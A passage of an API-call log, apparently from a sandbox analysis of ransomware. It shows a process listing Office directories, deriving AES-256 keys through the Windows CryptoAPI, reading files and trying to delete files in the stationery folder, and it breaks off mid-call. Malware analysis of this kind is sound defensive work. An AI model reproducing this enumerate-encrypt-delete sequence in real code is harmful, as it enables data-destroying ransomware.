| out: lpFindFileData=0x326c168) returned 1 [0139.324] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0139.324] FindNextFileW (in: hFindFile=0x284d528, lpFindFileData=0x326b3d8 | out: lpFindFileData=0x326b3d8) returned 1 [0139.324] FindNextFileW (in: hFindFile=0x284d528, lpFindFileData=0x326b3d8 | out: lpFindFileData=0x326b3d8) returned 1 [0139.324] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="MSCDM.DLL", cchWideChar=-1, lpMultiByteStr=0x326bee0, cbMultiByte=260, lpDefaultChar=0x326b6bf, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MSCDM.DLL", lpUsedDefaultChar=0x0) returned 10 [0139.324] FindNextFileW (in: hFindFile=0x284d528, lpFindFileData=0x326b3d8 | out: lpFindFileData=0x326b3d8) returned 0 [0139.324] FindClose (in: hFindFile=0x284d528 | out: hFindFile=0x284d528) returned 1 [0139.324] FindNextFileW (in: hFindFile=0x284d4e8, lpFindFileData=0x326c168 | out: lpFindFileData=0x326c168) returned 1 [0139.325] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0139.325] FindNextFileW (in: hFindFile=0x284d528, lpFindFileData=0x326b3d8 | out: lpFindFileData=0x326b3d8) returned 1 [0139.325] FindNextFileW (in: hFindFile=0x284d528, lpFindFileData=0x326b3d8 | out: lpFindFileData=0x326b3d8) returned 1 [0139.325] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0139.325] FindNextFileW (in: hFindFile=0x284d668, lpFindFileData=0x326a648 | out: lpFindFileData=0x326a648) returned 1 [0139.325] FindNextFileW (in: hFindFile=0x284d668, lpFindFileData=0x326a648 | out: lpFindFileData=0x326a648) returned 1 [0139.325] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="msinfo32.exe.mui", cchWideChar=-1, lpMultiByteStr=0x326b150, cbMultiByte=260, lpDefaultChar=0x326a92f, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="msinfo32.exe.mui", lpUsedDefaultChar=0x0) returned 17 [0139.325] FindNextFileW (in: hFindFile=0x284d668, lpFindFileData=0x326a648 | out: lpFindFileData=0x326a648) returned 0 [0139.325] FindClose (in: hFindFile=0x284d668 | out: hFindFile=0x284d668) returned 1 [0139.325] FindNextFileW (in: hFindFile=0x284d528, lpFindFileData=0x326b3d8 | out: lpFindFileData=0x326b3d8) returned 1 [0139.325] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="msinfo32.exe", cchWideChar=-1, lpMultiByteStr=0x326bee0, cbMultiByte=260, lpDefaultChar=0x326b6bf, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="msinfo32.exe", lpUsedDefaultChar=0x0) returned 13 [0139.325] FindNextFileW (in: hFindFile=0x284d528, lpFindFileData=0x326b3d8 | out: lpFindFileData=0x326b3d8) returned 0 [0139.325] FindClose (in: hFindFile=0x284d528 | out: hFindFile=0x284d528) returned 1 [0139.325] FindNextFileW (in: hFindFile=0x284d4e8, lpFindFileData=0x326c168 | out: lpFindFileData=0x326c168) returned 1 [0139.365] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0139.365] FindNextFileW (in: hFindFile=0x284d528, lpFindFileData=0x326b3d8 | out: lpFindFileData=0x326b3d8) returned 1 [0139.365] FindNextFileW (in: hFindFile=0x284d528, lpFindFileData=0x326b3d8 | out: lpFindFileData=0x326b3d8) returned 1 [0139.459] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0139.459] FindNextFileW (in: hFindFile=0x284d668, lpFindFileData=0x326a648 | out: lpFindFileData=0x326a648) returned 1 [0139.459] FindNextFileW (in: hFindFile=0x284d668, lpFindFileData=0x326a648 | out: lpFindFileData=0x326a648) returned 1 [0139.459] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ACEINTL.DLL", cchWideChar=-1, lpMultiByteStr=0x326b150, cbMultiByte=260, lpDefaultChar=0x326a92f, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ACEINTL.DLL", lpUsedDefaultChar=0x0) returned 12 [0139.459] FindNextFileW (in: hFindFile=0x284d668, lpFindFileData=0x326a648 | out: lpFindFileData=0x326a648) returned 1 [0139.459] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ACEODBCI.DLL", cchWideChar=-1, lpMultiByteStr=0x326b150, cbMultiByte=260, lpDefaultChar=0x326a92f, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ACEODBCI.DLL", lpUsedDefaultChar=0x0) returned 13 [0139.459] FindNextFileW (in: hFindFile=0x284d668, lpFindFileData=0x326a648 | out: lpFindFileData=0x326a648) returned 1 [0139.459] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ACERECR.DLL", cchWideChar=-1, lpMultiByteStr=0x326b150, cbMultiByte=260, lpDefaultChar=0x326a92f, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ACERECR.DLL", lpUsedDefaultChar=0x0) returned 12 [0139.459] FindNextFileW (in: hFindFile=0x284d668, lpFindFileData=0x326a648 | out: lpFindFileData=0x326a648) returned 1 [0139.459] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ACEWSTR.DLL", cchWideChar=-1, lpMultiByteStr=0x326b150, cbMultiByte=260, lpDefaultChar=0x326a92f, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ACEWSTR.DLL", lpUsedDefaultChar=0x0) returned 12 [0139.459] FindNextFileW (in: hFindFile=0x284d668, lpFindFileData=0x326a648 | out: lpFindFileData=0x326a648) returned 1 [0139.459] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ADO210.CHM", cchWideChar=-1, lpMultiByteStr=0x326b150, cbMultiByte=260, lpDefaultChar=0x326a92f, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ADO210.CHM", lpUsedDefaultChar=0x0) returned 11 [0139.459] FindNextFileW (in: hFindFile=0x284d668, lpFindFileData=0x326a648 | out: lpFindFileData=0x326a648) returned 1 [0139.459] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALRTINTL.DLL", cchWideChar=-1, lpMultiByteStr=0x326b150, cbMultiByte=260, lpDefaultChar=0x326a92f, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ALRTINTL.DLL", lpUsedDefaultChar=0x0) returned 13 [0139.459] FindNextFileW (in: hFindFile=0x284d668, lpFindFileData=0x326a648 | out: lpFindFileData=0x326a648) returned 1 [0139.459] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="MSOINTL.DLL", cchWideChar=-1, lpMultiByteStr=0x326b150, cbMultiByte=260, lpDefaultChar=0x326a92f, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MSOINTL.DLL", lpUsedDefaultChar=0x0) returned 12 [0139.459] FindNextFileW (in: hFindFile=0x284d668, lpFindFileData=0x326a648 | out: lpFindFileData=0x326a648) returned 1 [0139.459] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="MSOINTL.DLL.IDX_DLL", cchWideChar=-1, lpMultiByteStr=0x326b150, cbMultiByte=260, lpDefaultChar=0x326a92f, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MSOINTL.DLL.IDX_DLL", lpUsedDefaultChar=0x0) returned 20 [0139.459] FindNextFileW (in: hFindFile=0x284d668, lpFindFileData=0x326a648 | out: lpFindFileData=0x326a648) returned 1 [0139.459] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="MSOINTL.REST.IDX_DLL", cchWideChar=-1, lpMultiByteStr=0x326b150, cbMultiByte=260, lpDefaultChar=0x326a92f, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MSOINTL.REST.IDX_DLL", lpUsedDefaultChar=0x0) returned 21 [0139.459] FindNextFileW (in: hFindFile=0x284d668, lpFindFileData=0x326a648 | out: lpFindFileData=0x326a648) returned 1 [0139.459] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="MSSOAPR3.DLL", cchWideChar=-1, lpMultiByteStr=0x326b150, cbMultiByte=260, lpDefaultChar=0x326a92f, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MSSOAPR3.DLL", lpUsedDefaultChar=0x0) returned 13 [0139.459] FindNextFileW (in: hFindFile=0x284d668, lpFindFileData=0x326a648 | out: lpFindFileData=0x326a648) returned 1 [0139.460] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="OARPMANR.DLL", cchWideChar=-1, lpMultiByteStr=0x326b150, cbMultiByte=260, lpDefaultChar=0x326a92f, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OARPMANR.DLL", lpUsedDefaultChar=0x0) returned 13 [0139.460] FindNextFileW (in: hFindFile=0x284d668, lpFindFileData=0x326a648 | out: lpFindFileData=0x326a648) returned 1 [0139.460] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="README.HTM", cchWideChar=-1, lpMultiByteStr=0x326b150, cbMultiByte=260, lpDefaultChar=0x326a92f, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="README.HTM", lpUsedDefaultChar=0x0) returned 11 [0139.460] FindNextFileW (in: hFindFile=0x284d668, lpFindFileData=0x326a648 | out: lpFindFileData=0x326a648) returned 1 [0139.460] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="xlsrvintl.dll", cchWideChar=-1, lpMultiByteStr=0x326b150, cbMultiByte=260, lpDefaultChar=0x326a92f, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="xlsrvintl.dll", lpUsedDefaultChar=0x0) returned 14 [0139.460] FindNextFileW (in: hFindFile=0x284d668, lpFindFileData=0x326a648 | out: lpFindFileData=0x326a648) returned 0 [0139.460] FindClose (in: hFindFile=0x284d668 | out: hFindFile=0x284d668) returned 1 [0139.460] FindNextFileW (in: hFindFile=0x284d528, lpFindFileData=0x326b3d8 | out: lpFindFileData=0x326b3d8) returned 1 [0139.460] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ACECORE.DLL", cchWideChar=-1, lpMultiByteStr=0x326bee0, cbMultiByte=260, lpDefaultChar=0x326b6bf, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ACECORE.DLL", lpUsedDefaultChar=0x0) returned 12 [0139.460] FindNextFileW (in: hFindFile=0x284d528, lpFindFileData=0x326b3d8 | out: lpFindFileData=0x326b3d8) returned 1 [0139.460] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ACEDAO.DLL", cchWideChar=-1, lpMultiByteStr=0x326bee0, cbMultiByte=260, lpDefaultChar=0x326b6bf, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ACEDAO.DLL", lpUsedDefaultChar=0x0) returned 11 [0139.460] FindNextFileW (in: hFindFile=0x284d528, lpFindFileData=0x326b3d8 | out: lpFindFileData=0x326b3d8) returned 1 [0139.460] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ACEERR.DLL", cchWideChar=-1, lpMultiByteStr=0x326bee0, cbMultiByte=260, lpDefaultChar=0x326b6bf, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ACEERR.DLL", lpUsedDefaultChar=0x0) returned 11 [0139.460] FindNextFileW (in: hFindFile=0x284d528, lpFindFileData=0x326b3d8 | out: lpFindFileData=0x326b3d8) returned 1 [0139.461] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ACEES.DLL", cchWideChar=-1, lpMultiByteStr=0x326bee0, cbMultiByte=260, lpDefaultChar=0x326b6bf, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ACEES.DLL", lpUsedDefaultChar=0x0) returned 10 [0139.461] FindNextFileW (in: hFindFile=0x284d528, lpFindFileData=0x326b3d8 | out: lpFindFileData=0x326b3d8) returned 1 [0139.461] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ACEEXCH.DLL", cchWideChar=-1, lpMultiByteStr=0x326bee0, cbMultiByte=260, lpDefaultChar=0x326b6bf, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ACEEXCH.DLL", lpUsedDefaultChar=0x0) returned 12 [0139.461] FindNextFileW (in: hFindFile=0x284d528, lpFindFileData=0x326b3d8 | out: lpFindFileData=0x326b3d8) returned 1 [0139.461] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ACEEXCL.DLL", cchWideChar=-1, lpMultiByteStr=0x326bee0, cbMultiByte=260, lpDefaultChar=0x326b6bf, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ACEEXCL.DLL", lpUsedDefaultChar=0x0) returned 12 [0139.461] FindNextFileW (in: hFindFile=0x284d528, lpFindFileData=0x326b3d8 | out: lpFindFileData=0x326b3d8) returned 1 [0139.461] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ACEODBC.DLL", cchWideChar=-1, lpMultiByteStr=0x326bee0, cbMultiByte=260, lpDefaultChar=0x326b6bf, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ACEODBC.DLL", lpUsedDefaultChar=0x0) returned 12 [0139.461] FindNextFileW (in: hFindFile=0x284d528, lpFindFileData=0x326b3d8 | out: lpFindFileData=0x326b3d8) returned 1 [0139.461] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ACEODDBS.DLL", cchWideChar=-1, lpMultiByteStr=0x326bee0, cbMultiByte=260, lpDefaultChar=0x326b6bf, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ACEODDBS.DLL", lpUsedDefaultChar=0x0) returned 13 [0139.461] FindNextFileW (in: hFindFile=0x284d528, lpFindFileData=0x326b3d8 | out: lpFindFileData=0x326b3d8) returned 1 [0139.461] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ACEODEXL.DLL", cchWideChar=-1, lpMultiByteStr=0x326bee0, cbMultiByte=260, lpDefaultChar=0x326b6bf, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ACEODEXL.DLL", lpUsedDefaultChar=0x0) returned 13 [0139.461] FindNextFileW (in: hFindFile=0x284d528, lpFindFileData=0x326b3d8 | out: lpFindFileData=0x326b3d8) returned 1 [0139.461] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ACEODTXT.DLL", cchWideChar=-1, lpMultiByteStr=0x326bee0, cbMultiByte=260, lpDefaultChar=0x326b6bf, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ACEODTXT.DLL", lpUsedDefaultChar=0x0) returned 13 [0139.461] FindNextFileW (in: hFindFile=0x284d528, lpFindFileData=0x326b3d8 | out: lpFindFileData=0x326b3d8) returned 1 [0139.461] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ACEOLEDB.DLL", cchWideChar=-1, lpMultiByteStr=0x326bee0, cbMultiByte=260, lpDefaultChar=0x326b6bf, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ACEOLEDB.DLL", lpUsedDefaultChar=0x0) returned 13 [0139.461] FindNextFileW (in: hFindFile=0x284d528, lpFindFileData=0x326b3d8 | out: lpFindFileData=0x326b3d8) returned 1 [0139.461] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ACER3X.DLL", cchWideChar=-1, lpMultiByteStr=0x326bee0, cbMultiByte=260, lpDefaultChar=0x326b6bf, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ACER3X.DLL", lpUsedDefaultChar=0x0) returned 11 [0139.461] FindNextFileW (in: hFindFile=0x284d528, lpFindFileData=0x326b3d8 | out: lpFindFileData=0x326b3d8) returned 1 [0139.461] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ACERCLR.DLL", cchWideChar=-1, lpMultiByteStr=0x326bee0, cbMultiByte=260, lpDefaultChar=0x326b6bf, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ACERCLR.DLL", lpUsedDefaultChar=0x0) returned 12 [0139.461] FindNextFileW (in: hFindFile=0x284d528, lpFindFileData=0x326b3d8 | out: lpFindFileData=0x326b3d8) returned 1 [0139.461] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ACEREP.DLL", cchWideChar=-1, lpMultiByteStr=0x326bee0, cbMultiByte=260, lpDefaultChar=0x326b6bf, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ACEREP.DLL", lpUsedDefaultChar=0x0) returned 11 [0139.461] FindNextFileW (in: hFindFile=0x284d528, lpFindFileData=0x326b3d8 | out: lpFindFileData=0x326b3d8) returned 1 [0139.461] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ACETXT.DLL", cchWideChar=-1, lpMultiByteStr=0x326bee0, cbMultiByte=260, lpDefaultChar=0x326b6bf, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ACETXT.DLL", lpUsedDefaultChar=0x0) returned 11 [0139.461] FindNextFileW (in: hFindFile=0x284d528, lpFindFileData=0x326b3d8 | out: lpFindFileData=0x326b3d8) returned 1 [0139.461] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ACEWDAT.DLL", cchWideChar=-1, lpMultiByteStr=0x326bee0, cbMultiByte=260, lpDefaultChar=0x326b6bf, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ACEWDAT.DLL", lpUsedDefaultChar=0x0) returned 12 [0139.461] FindNextFileW (in: hFindFile=0x284d528, lpFindFileData=0x326b3d8 | out: lpFindFileData=0x326b3d8) returned 1 [0139.461] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ACEWSS.DLL", cchWideChar=-1, lpMultiByteStr=0x326bee0, cbMultiByte=260, lpDefaultChar=0x326b6bf, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ACEWSS.DLL", lpUsedDefaultChar=0x0) returned 11 [0139.461] FindNextFileW (in: hFindFile=0x284d528, lpFindFileData=0x326b3d8 | out: lpFindFileData=0x326b3d8) returned 1 [0139.461] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ACEXBE.DLL", cchWideChar=-1, lpMultiByteStr=0x326bee0, cbMultiByte=260, lpDefaultChar=0x326b6bf, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ACEXBE.DLL", lpUsedDefaultChar=0x0) returned 11 [0139.461] FindNextFileW (in: hFindFile=0x284d528, lpFindFileData=0x326b3d8 | out: lpFindFileData=0x326b3d8) returned 1 [0139.461] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ATLCONV.DLL", cchWideChar=-1, lpMultiByteStr=0x326bee0, cbMultiByte=260, lpDefaultChar=0x326b6bf, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ATLCONV.DLL", lpUsedDefaultChar=0x0) returned 12 [0139.461] FindNextFileW (in: hFindFile=0x284d528, lpFindFileData=0x326b3d8 | out: lpFindFileData=0x326b3d8) returned 1 [0139.461] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Csi.dll", cchWideChar=-1, lpMultiByteStr=0x326bee0, cbMultiByte=260, lpDefaultChar=0x326b6bf, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Csi.dll", lpUsedDefaultChar=0x0) returned 8 [0139.461] FindNextFileW (in: hFindFile=0x284d528, lpFindFileData=0x326b3d8 | out: lpFindFileData=0x326b3d8) returned 1 [0139.461] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CsiSoap.dll", cchWideChar=-1, lpMultiByteStr=0x326bee0, cbMultiByte=260, lpDefaultChar=0x326b6bf, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CsiSoap.dll", lpUsedDefaultChar=0x0) returned 12 [0139.461] FindNextFileW (in: hFindFile=0x284d528, lpFindFileData=0x326b3d8 | out: lpFindFileData=0x326b3d8) returned 1 [0139.462] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0139.462] FindNextFileW (in: hFindFile=0x284d668, lpFindFileData=0x326a648 | out: lpFindFileData=0x326a648) returned 1 [0139.462] FindNextFileW (in: hFindFile=0x284d668, lpFindFileData=0x326a648 | out: lpFindFileData=0x326a648) returned 1 [0139.462] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="OFFICE.ODF", cchWideChar=-1, lpMultiByteStr=0x326b150, cbMultiByte=260, lpDefaultChar=0x326a92f, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OFFICE.ODF", lpUsedDefaultChar=0x0) returned 11 [0139.462] FindNextFileW (in: hFindFile=0x284d668, lpFindFileData=0x326a648 | out: lpFindFileData=0x326a648) returned 0 [0139.462] FindClose (in: hFindFile=0x284d668 | out: hFindFile=0x284d668) returned 1 [0139.462] FindNextFileW (in: hFindFile=0x284d528, lpFindFileData=0x326b3d8 | out: lpFindFileData=0x326b3d8) returned 1 [0139.462] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="EXPSRV.DLL", cchWideChar=-1, lpMultiByteStr=0x326bee0, cbMultiByte=260, lpDefaultChar=0x326b6bf, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="EXPSRV.DLL", lpUsedDefaultChar=0x0) returned 11 [0139.462] FindNextFileW (in: hFindFile=0x284d528, lpFindFileData=0x326b3d8 | out: lpFindFileData=0x326b3d8) returned 1 [0139.462] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="EXP_PDF.DLL", cchWideChar=-1, lpMultiByteStr=0x326bee0, cbMultiByte=260, lpDefaultChar=0x326b6bf, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="EXP_PDF.DLL", lpUsedDefaultChar=0x0) returned 12 [0139.463] FindNextFileW (in: hFindFile=0x284d528, lpFindFileData=0x326b3d8 | out: lpFindFileData=0x326b3d8) returned 1 [0139.463] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="EXP_XPS.DLL", cchWideChar=-1, lpMultiByteStr=0x326bee0, cbMultiByte=260, lpDefaultChar=0x326b6bf, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="EXP_XPS.DLL", lpUsedDefaultChar=0x0) returned 12 [0139.506] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0139.646] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0139.693] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0139.733] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0139.771] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0139.818] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0139.862] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0139.911] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0139.915] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0139.917] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0139.918] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0139.932] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0139.932] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0139.933] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0139.934] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0139.934] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0139.934] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0139.944] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0139.945] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0139.946] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0139.947] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0139.948] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0139.969] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0139.971] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0139.976] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0139.977] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0139.978] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0139.978] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0139.979] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0139.995] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0139.997] CryptAcquireContextW (in: phProv=0x326b25c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326b25c*=0xa52568) returned 1 [0139.998] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326b260 | out: phHash=0x326b260) returned 1 [0139.998] CryptHashData (hHash=0x284d668, pbData=0x9d1458, dwDataLen=0x100, dwFlags=0x0) returned 1 [0139.998] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d668, dwFlags=0x0, phKey=0x326b254 | out: phKey=0x326b254*=0x284d628) returned 1 [0139.998] GetFileSize (in: hFile=0x40c, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xff [0139.998] ReadFile (in: hFile=0x40c, lpBuffer=0x326b2d4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326b264, lpOverlapped=0x0 | out: lpBuffer=0x326b2d4*, lpNumberOfBytesRead=0x326b264*=0x80, lpOverlapped=0x0) returned 1 [0140.000] CryptDestroyHash (hHash=0x284d668) returned 1 [0140.000] CryptDestroyKey (hKey=0x284d628) returned 1 [0140.000] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0140.000] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Bears.htm" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\bears.htm")) returned 0 [0140.001] CryptAcquireContextW (in: phProv=0x326b25c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326b25c*=0xa52568) returned 1 [0140.002] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326b260 | out: phHash=0x326b260) returned 1 [0140.002] CryptHashData (hHash=0x284d568, pbData=0x9d1458, dwDataLen=0x100, dwFlags=0x0) returned 1 [0140.002] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d568, dwFlags=0x0, phKey=0x326b254 | out: phKey=0x326b254*=0x284d628) returned 1 [0140.002] GetFileSize (in: hFile=0x410, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x432 [0140.002] ReadFile (in: hFile=0x410, lpBuffer=0x326b2d4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326b264, lpOverlapped=0x0 | out: lpBuffer=0x326b2d4*, lpNumberOfBytesRead=0x326b264*=0x80, lpOverlapped=0x0) returned 1 [0140.004] CryptDestroyHash (hHash=0x284d568) returned 1 [0140.004] CryptDestroyKey (hKey=0x284d628) returned 1 [0140.004] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0140.005] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Bears.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\bears.jpg")) returned 0 [0140.007] CryptAcquireContextW (in: phProv=0x326b25c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326b25c*=0xa52568) returned 1 [0140.007] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326b260 | out: phHash=0x326b260) returned 1 [0140.007] CryptHashData (hHash=0x284d668, pbData=0x9d1458, dwDataLen=0x100, dwFlags=0x0) returned 1 [0140.007] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d668, dwFlags=0x0, phKey=0x326b254 | out: phKey=0x326b254*=0x284d628) returned 1 [0140.007] GetFileSize (in: hFile=0x40c, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xa0f [0140.007] ReadFile (in: hFile=0x40c, lpBuffer=0x326b2d4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326b264, lpOverlapped=0x0 | out: lpBuffer=0x326b2d4*, lpNumberOfBytesRead=0x326b264*=0x80, lpOverlapped=0x0) returned 1 [0140.010] CryptDestroyHash (hHash=0x284d668) returned 1 [0140.010] CryptDestroyKey (hKey=0x284d628) returned 1 [0140.010] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0140.011] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Blue_Gradient.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\blue_gradient.jpg")) returned 0 [0140.011] CryptAcquireContextW (in: phProv=0x326b25c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326b25c*=0xa52568) returned 1 [0140.012] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326b260 | out: phHash=0x326b260) returned 1 [0140.012] CryptHashData (hHash=0x284d568, pbData=0x9d1458, dwDataLen=0x100, dwFlags=0x0) returned 1 [0140.012] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d568, dwFlags=0x0, phKey=0x326b254 | out: phKey=0x326b254*=0x284d628) returned 1 [0140.012] GetFileSize (in: hFile=0x410, 